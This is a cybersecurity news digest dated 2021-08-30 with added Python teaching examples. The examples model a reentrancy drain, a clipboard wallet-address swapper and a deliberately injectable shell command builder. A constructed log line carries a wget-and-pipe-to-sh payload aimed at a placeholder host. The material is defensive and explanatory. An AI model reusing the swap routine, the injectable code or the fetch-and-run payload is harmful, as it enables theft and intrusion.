Daily NCSC-FI news followup 2021-08-30

Hackers, tractors, and a few delayed actors. How hacker Sick Codes learned too much about John Deere: Lock and Code S02E16

blog.malwarebytes.com/podcast/2021/08/hackers-tractors-and-a-few-delayed-actors-how-hacker-sick-codes-learned-too-much-about-john-deere-lock-and-code-s02e16/ No one ever wants a group of hackers to say about their company: "We had the keys to the kingdom." But that's exactly what the hacker Sick Codes said on this week's episode of Lock and Code, speaking with host David Ruiz about his and fellow hackers' efforts to peer into John Deere's data operations center, where the company receives a near-endless stream of data from its Internet-connected tractors, combines, and other smart farming equipment.

The Mostly Dead Mozi and Its Lingering Bots

blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/ It has been nearly two years since we (360NETLAB) first disclosed the Mozi botnet in December 2019, and in that time we have witnessed its development from a small-scale botnet to a giant that accounted for an extremely high percentage of IoT traffic at its peak. Now that Mozi's authors have been taken into custody by law enforcement agencies, with our technical assistance throughout, we don't think it will continue to be updated for quite some time to come. But we know that Mozi uses a P2P network structure, and one of the "advantages" of a P2P network is that it is robust: even if some of the nodes go down, the whole network carries on, and the remaining nodes still infect other vulnerable devices. That is why we can still see Mozi spreading.

Microsoft Exchange ProxyToken bug can let hackers steal user email

www.bleepingcomputer.com/news/security/microsoft-exchange-proxytoken-bug-can-let-hackers-steal-user-email/ Technical details have emerged on a serious vulnerability in Microsoft Exchange Server dubbed ProxyToken that does not require authentication to access emails from a target account. An attacker can exploit the vulnerability by crafting a request to web services within the Exchange Control Panel (ECP) application and steal messages from a victim's inbox. Also: threatpost.com/microsoft-exchange-proxytoken-email/169030/

CISA Adds Single-Factor Authentication to list of Bad Practices

us-cert.cisa.gov/ncas/current-activity/2021/08/30/cisa-adds-single-factor-authentication-list-bad-practices Today, CISA added the use of single-factor authentication for remote or administrative access systems to our Bad Practices list of exceptionally risky cybersecurity practices. Single-factor authentication is a common low-security method of authentication. It only requires matching one factor, such as a password, to a username to gain access to a system.

Hackers steal $29 million from crypto-platform Cream Finance

therecord.media/hackers-steal-29-million-from-crypto-platform-cream-finance/ Hackers are estimated to have stolen more than $29 million in cryptocurrency assets from Cream Finance, a decentralized finance (DeFi) platform that allows users to loan and speculate on cryptocurrency price variations. The company confirmed the hack earlier today, half an hour after blockchain security firm PeckShield noticed signs of an ongoing attack: "C.R.E.A.M. v1 market on Ethereum has suffered an exploit, resulting in a loss of 418,311,571 in AMP and 1,308.09 in ETH, by way of reentrancy on the AMP token contract."
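
The statement names the mechanism, reentrancy through the token contract, but not how it works. The following is an added example for this digest and is not the Cream Finance or AMP contract code: a toy lending pool and a toy token whose transfer() notifies the recipient (loosely modelled on ERC777-style receive hooks), so the re-entry path and the two standard defences can be traced end to end. All class and function names are invented.

```python
"""Reentrancy through a token transfer hook: a simplified Python model.

Added example, not the Cream/AMP contracts. The token calls back into the
recipient during transfer(); the vulnerable pool does its bookkeeping after
that call, so the attacker's hook can withdraw again against stale state.
"""


class HookedToken:
    """Balances plus a transfer() that calls back into the recipient."""

    def __init__(self):
        self.balances = {}

    def balance_of(self, who):
        return self.balances.get(who, 0)

    def mint(self, who, amount):
        self.balances[who] = self.balance_of(who) + amount

    def transfer(self, sender, recipient, amount):
        if self.balance_of(sender) < amount:
            raise ValueError("token: insufficient balance")
        self.balances[sender] -= amount
        self.balances[recipient] = self.balance_of(recipient) + amount
        # Receive hook: control passes to the recipient's code before the
        # caller (the pool) has finished its own bookkeeping.
        hook = getattr(recipient, "tokens_received", None)
        if hook is not None:
            hook(sender, amount)


class VulnerablePool:
    """Check -> interaction -> effect: the classic reentrancy ordering bug."""

    def __init__(self, token):
        self.token = token
        self.deposits = {}

    def deposit(self, who, amount):
        self.token.transfer(who, self, amount)
        self.deposits[who] = self.deposits.get(who, 0) + amount

    def withdraw(self, who, amount):
        if self.deposits.get(who, 0) < amount:      # check
            raise ValueError("pool: insufficient deposit")
        self.token.transfer(self, who, amount)      # interaction: hook fires here
        self.deposits[who] -= amount                # effect: too late, may go negative


class HardenedPool(VulnerablePool):
    """Checks-effects-interactions ordering plus a reentrancy guard."""

    def __init__(self, token):
        super().__init__(token)
        self._entered = False

    def withdraw(self, who, amount):
        if self._entered:
            raise RuntimeError("pool: reentrant call rejected")
        self._entered = True
        try:
            if self.deposits.get(who, 0) < amount:  # check
                raise ValueError("pool: insufficient deposit")
            self.deposits[who] -= amount            # effect first
            self.token.transfer(self, who, amount)  # interaction last
        finally:
            self._entered = False


class Account:
    """An honest depositor with no receive hook."""


class Attacker:
    """Re-enters withdraw() from inside the token's receive hook."""

    def __init__(self, pool, token, amount, max_reentries):
        self.pool, self.token, self.amount = pool, token, amount
        self.max_reentries, self.reentries = max_reentries, 0

    def tokens_received(self, sender, amount):
        if self.reentries < self.max_reentries and self.token.balance_of(self.pool) >= self.amount:
            self.reentries += 1
            try:
                self.pool.withdraw(self, self.amount)
            except (ValueError, RuntimeError):
                pass  # a contract would try/catch so its legitimate withdrawal still lands

    def run(self):
        self.pool.deposit(self, self.amount)
        self.pool.withdraw(self, self.amount)


def run_attack(pool_cls, honest_deposit=1000, attacker_deposit=100, max_reentries=5):
    """Return (attacker token balance, pool token balance) after the attack."""
    token = HookedToken()
    pool = pool_cls(token)
    honest = Account()
    token.mint(honest, honest_deposit)
    pool.deposit(honest, honest_deposit)
    attacker = Attacker(pool, token, attacker_deposit, max_reentries)
    token.mint(attacker, attacker_deposit)
    attacker.run()
    return token.balance_of(attacker), token.balance_of(pool)


if __name__ == "__main__":
    print("vulnerable:", run_attack(VulnerablePool))  # (600, 500): 100 in, 600 out
    print("hardened:  ", run_attack(HardenedPool))    # (100, 1000)
```

Against the vulnerable pool the attacker deposits 100, and each of the five nested hook calls passes the balance check because the deposit is only decremented after the transfer returns; the pool ends up 500 short of the honest depositor's funds and the attacker's ledger entry is -500. With effects before interactions the second check already sees 0, and the guard rejects the nested call outright, so exactly the 100 deposited comes back.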

Cryptocurrency Clipboard Swapper Delivered With Love

isc.sans.edu/forums/diary/Cryptocurrency+Clipboard+Swapper+Delivered+With+Love/27794/ Be careful if you're a user of cryptocurrencies. My goal is not to re-open a debate about them and their associated financial risks. No, I'm talking here about technical risk. Wallet addresses are long strings of characters that are practically impossible to type by hand. It means that you'll use your clipboard to copy/paste your wallet addresses to perform payments. But some malware monitors your clipboard for "interesting data" (like wallet addresses) and tries to replace it with another one.
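
To make the two halves of that concrete, what the malware matches and what the user can check, here is an added example for this digest; it is not code from the ISC diary or from any malware sample. The regexes, the swap routine and the attacker address are constructed for the demonstration; the only real-world address used is the Bitcoin genesis-block address, purely as a syntactically valid input.

```python
"""Cryptocurrency clipboard swapping, modelled, and the check that defeats it.

Added example; not the diary's code nor any malware's. Addresses other than
the Bitcoin genesis-block address are constructed here.
"""
import hashlib
import re

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# What a swapper hunts for in clipboard text: legacy Bitcoin (Base58Check,
# leading 1 or 3), bech32 Bitcoin (bc1...) and Ethereum (0x + 40 hex digits).
WALLET_PATTERNS = {
    "btc_legacy": re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    "btc_bech32": re.compile(r"\bbc1[ac-hj-np-z02-9]{11,71}\b"),
    "eth": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
}


def sha256d(data: bytes) -> bytes:
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def b58check_encode(payload: bytes) -> str:
    """Base58Check: payload || first 4 bytes of sha256d(payload)."""
    data = payload + sha256d(payload)[:4]
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    # each leading zero byte is encoded as a leading '1'
    return "1" * (len(data) - len(data.lstrip(b"\x00"))) + out


def b58check_valid(addr: str) -> bool:
    """True if a 25-byte (version + hash160 + checksum) address is self-consistent."""
    n = 0
    for ch in addr:
        if ch not in B58:
            return False
        n = n * 58 + B58.index(ch)
    try:
        data = n.to_bytes(25, "big")
    except OverflowError:
        return False
    return sha256d(data[:-4])[:4] == data[-4:]


# Constructed attacker-controlled destinations. The Bitcoin one is built from a
# dummy hash160 so it passes checksum validation: a correct checksum says nothing
# about WHO owns the address, which is why wallet-side checksums don't stop swappers.
ATTACKER_ADDRESSES = {
    "btc_legacy": b58check_encode(b"\x00" + b"\x42" * 20),
    "eth": "0x" + "ab" * 20,
}


def find_wallet_addresses(text: str) -> dict:
    """Classify every wallet address present in text, keyed by kind."""
    return {kind: pat.findall(text) for kind, pat in WALLET_PATTERNS.items() if pat.search(text)}


def swap_clipboard(clip: str) -> str:
    """The malware's core step: rewrite each recognised address to the attacker's."""
    for kind, pat in WALLET_PATTERNS.items():
        if kind in ATTACKER_ADDRESSES:
            clip = pat.sub(ATTACKER_ADDRESSES[kind], clip)
    return clip


def paste_is_tampered(copied: str, pasted: str) -> bool:
    """User-side defence: what lands in the payment field must equal what was
    copied, compared in full. Swappers often pick a replacement that shares the
    first few characters, so glancing at the prefix is not enough."""
    return copied.strip() != pasted.strip()
```

The detection regexes are the same ones a swapper needs, which is the point: the malware does nothing clever, it only needs to recognise the format. The defence is equally plain, compare the whole pasted string with the source (a second channel such as the recipient's own page or a QR code), or send a small test amount first.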

QNAP works on patches for OpenSSL bugs impacting its NAS devices

www.bleepingcomputer.com/news/security/qnap-works-on-patches-for-openssl-bugs-impacting-its-nas-devices/ Network-attached storage (NAS) maker QNAP is investigating and working on security updates to address remote code execution (RCE) and denial-of-service (DoS) vulnerabilities patched by OpenSSL last week. The security flaws, tracked as CVE-2021-3711 and CVE-2021-3712, impact QNAP NAS devices running QTS, QuTS hero, QuTScloud, and HBS 3 Hybrid Backup Sync (a backup and disaster recovery app), according to advisories published earlier today.
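
Until QNAP ships its updates, the practical question on any host where the OpenSSL binary can be run is whether the linked version falls in the affected ranges. The following is an added example for this digest, not QNAP's or OpenSSL's code; the ranges are those given in the OpenSSL security advisory of 24 August 2021 (CVE-2021-3711: 1.1.1 through 1.1.1k, fixed in 1.1.1l, 1.0.2 not affected; CVE-2021-3712: 1.1.1 through 1.1.1k fixed in 1.1.1l, and 1.0.2 through 1.0.2y fixed in 1.0.2za). The version banners in the usage are constructed.

```python
"""Classify an `openssl version` banner against CVE-2021-3711 / CVE-2021-3712.

Added example; fixed-version data from the OpenSSL advisory of 24 Aug 2021.
"""
import re

VERSION_RE = re.compile(r"OpenSSL (\d+)\.(\d+)\.(\d+)([a-z]*)")

# Branch -> first fixed release, per CVE. 1.0.2 is not affected by 3711.
FIXES = {
    "CVE-2021-3711": {(1, 1, 1): "OpenSSL 1.1.1l"},
    "CVE-2021-3712": {(1, 1, 1): "OpenSSL 1.1.1l", (1, 0, 2): "OpenSSL 1.0.2za"},
}


def parse_version(banner: str) -> tuple:
    """'OpenSSL 1.1.1k  25 Mar 2021' -> (1, 1, 1, 11); letter suffixes are
    ordered a..z then za, zb..., so 'z' -> 26 and 'za' -> 27."""
    m = VERSION_RE.search(banner)
    if not m:
        raise ValueError(f"not an OpenSSL version banner: {banner!r}")
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    suffix = sum(ord(c) - ord("a") + 1 for c in m.group(4))
    return (major, minor, patch, suffix)


def affected_cves(banner: str):
    """List of CVEs the build is exposed to; None if the branch (e.g. 1.1.0)
    is not covered by the advisory, which means out of support, not safe."""
    version = parse_version(banner)
    branch = version[:3]
    if not any(branch in fixes for fixes in FIXES.values()):
        return None
    return [cve for cve, fixes in FIXES.items()
            if branch in fixes and version < parse_version(fixes[branch])]


if __name__ == "__main__":
    for banner in ("OpenSSL 1.1.1k  25 Mar 2021", "OpenSSL 1.1.1l  24 Aug 2021",
                   "OpenSSL 1.0.2y  16 Feb 2021", "OpenSSL 1.1.0l  10 Sep 2019"):
        print(banner, "->", affected_cves(banner))
```

Note that appliances often carry vendor backports, so a banner alone can be a false positive; the vendor advisory, here QNAP's, is the authority for those. An unknown branch is reported as None rather than an empty list so that an out-of-support build is not mistaken for a patched one.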

LockBit Gang to Publish 103GB of Bangkok Air Customer Data

The LockBit ransomware gang has apparently struck again, having purportedly stolen 103GB worth of files from Bangkok Airways and promising to release them tomorrow, on Tuesday. A Dark Web intelligence firm calling itself DarkTracer (apparently a separate intel firm from the better-known DarkTrace) tweeted a screen capture of a countdown clock from LockBit 2.0 that, as of Friday, showed four and a half days left.


Citizens are being scammed again: authority warns of porn extortion

www.is.fi/digitoday/tietoturva/art-2000008228312.html The porn extortion that has harassed Finns for years shows no sign of easing. The Cyber Security Centre, which operates under Traficom, updated its article on the subject on Monday and stressed that these adult-entertainment-themed extortion messages are still circulating in large numbers. In the messages the scammer claims to have secretly filmed the recipient while they visited adult sites, using malware installed on the device. However, nothing has been filmed and there is no malware. Nothing should be paid to the scammer, and the messages can simply be deleted.

House defense policy bill okays $10.4 billion for DoD cybersecurity

therecord.media/house-defense-policy-bill-okays-10-4-billion-for-dod-cybersecurity/ The House version of the annual defense policy bill backs the Biden administration's proposed $10.4 billion cybersecurity budget for the Defense Department next year, according to an aide for the panel's Democratic majority. "We support the President's budget request," the aide said, adding that the annual National Defense Authorization Act provides additional investment for the protection of the Pentagon's information systems. A summary of the bill shows an additional $50 million for such work.

The Underground Economy: Recon, Weaponization & Delivery for Account Takeovers

threatpost.com/underground-economy-account-takeovers/169032/ In part one of a two-part series, Akamai's director of security technology and strategy, Tony Lauro, lays out what orgs need to know to defend against account takeover attacks. With account takeover (ATO) attacks on the rise, stopping threat actors in the early phases of the kill chain will help today's defenders gain an upper hand against direct fraud campaigns. Understanding how and where these attacks are carried out, and the underlying support structure enabling ATO, is key to informing what types of defenses should be deployed to help reduce an organization's risk and the associated pain of customer account compromise.

10 Reasons to Trust Your Enterprise APIs

blogs.cisco.com/security/10-reasons-to-trust-your-enterprise-apis Recently one of the big-three consumer credit bureaus fixed an issue that allowed an ordinary user to obtain the credit score of tens of millions of Americans just by providing their name and mailing address. The connective tissue making this data exposure possible was an Application Programming Interface or API. An API enables two pieces of software to communicate with each other. Just think about the different ways you interface with software. You might open a web interface to access email or launch your favorite social media app to connect with friends. Each of these workflows is more than likely using an API and has a distinct interface or way in which you achieve a particular task.

How Apple plans to monitor users

www.kaspersky.com/blog/what-is-apple-csam-detection/41502/ In early August 2021, Apple unveiled its new system for identifying photos containing images of child abuse. Although Apple's motives, combating the dissemination of child pornography, seem indisputably well-intentioned, the announcement immediately came under fire. Apple has long cultivated an image of itself as a device maker that cares about user privacy. New features anticipated for iOS 15 and iPadOS 15 have already dealt a serious blow to that reputation, but the company is not backing down. Here's what happened and how it will affect average users of iPhones and iPads.

New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)

unit42.paloaltonetworks.com/cve-2021-32305-websvn/ We have observed exploits in the wild for a recently disclosed command injection vulnerability affecting WebSVN, an open-source web application for browsing source code. The critical command injection vulnerability was discovered and patched in May 2021. A proof of concept was released and within a week, on June 26, 2021, attackers exploited the vulnerability to deploy variants of the Mirai DDoS malware. We strongly recommend that WebSVN users upgrade to the latest software version.
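
The advisory names the bug class, command injection through a web parameter, without showing it. Here is an added example for this digest; it is not WebSVN's code (WebSVN is a PHP application and its fix lives in the project's own repository). It generalises the class: a builder that concatenates the request parameter into a shell string, the argv-based form that neutralises it, an input allowlist, and a log check for requests carrying shell metacharacters. The endpoint name search.php and parameter name search are assumptions, the log lines are constructed (including the payload, which only mimics the shape of a bot-loader request), and `echo` stands in for the real svn/grep command so the block runs anywhere.

```python
"""Command injection via a web parameter: vulnerable builder, hardened builder,
and a log check. Added example, not WebSVN's code; see lead-in for assumptions."""
import re
import subprocess
from urllib.parse import parse_qs, urlsplit


def vulnerable_search(term: str) -> str:
    """String concatenation into a shell: ';', '|', '`', '$()' and newlines all
    let the requester run a command of their own beside the intended one."""
    cmd = "echo " + term  # stand-in for an svn/grep invocation
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_without_shell(term: str) -> str:
    """argv form: no shell parses the string, so metacharacters are just bytes
    inside one argument. This alone removes the injection."""
    return subprocess.run(["echo", term], capture_output=True, text=True).stdout


SAFE_TERM = re.compile(r"[\w.\-/ ]{1,200}")


def hardened_search(term: str) -> str:
    """Defence in depth: allowlist the input, then avoid the shell entirely."""
    if not SAFE_TERM.fullmatch(term):
        raise ValueError("search term contains characters outside the allowlist")
    return run_without_shell(term)


# Detection side: decoded query values carrying shell metacharacters or newlines.
SHELL_META = re.compile(r"[;&|`$<>\n]")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_search_requests(log_lines):
    """Return (client, parameter, decoded value) for search.php requests whose
    parameters contain shell metacharacters. Expects combined log format."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/search.php"):  # assumed endpoint name
            continue
        client = line.split(" ", 1)[0]
        for key, values in parse_qs(url.query).items():  # parse_qs percent-decodes
            for value in values:
                if SHELL_META.search(value):
                    hits.append((client, key, value))
    return hits


# Constructed sample log lines (TEST-NET addresses). The second only mimics the
# shape of a loader request; it is not a captured WebSVN exploit.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Jun/2021:10:01:02 +0000] "GET /websvn/search.php?search=readme HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Jun/2021:10:01:09 +0000] "GET /websvn/search.php?search=x%3Bwget+http%3A%2F%2F198.51.100.9%2Fbot.sh%7Csh HTTP/1.1" 200 88 "-" "curl/7.68.0"',
    '10.0.0.8 - - [26/Jun/2021:10:02:00 +0000] "GET /websvn/listing.php?repname=core HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(repr(vulnerable_search("foo; echo INJECTED")))  # 'foo\nINJECTED\n'
    print(repr(run_without_shell("foo; echo INJECTED")))  # 'foo; echo INJECTED\n'
    print(suspicious_search_requests(SAMPLE_LOG))
```

The two builders differ in one decision only, whether a shell ever sees the request parameter; the allowlist is the second layer for the case where some downstream tool does interpret its arguments. The log check is the retrospective question an operator asks after reading an advisory like this one: did anyone send us metacharacters in that parameter before we patched.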
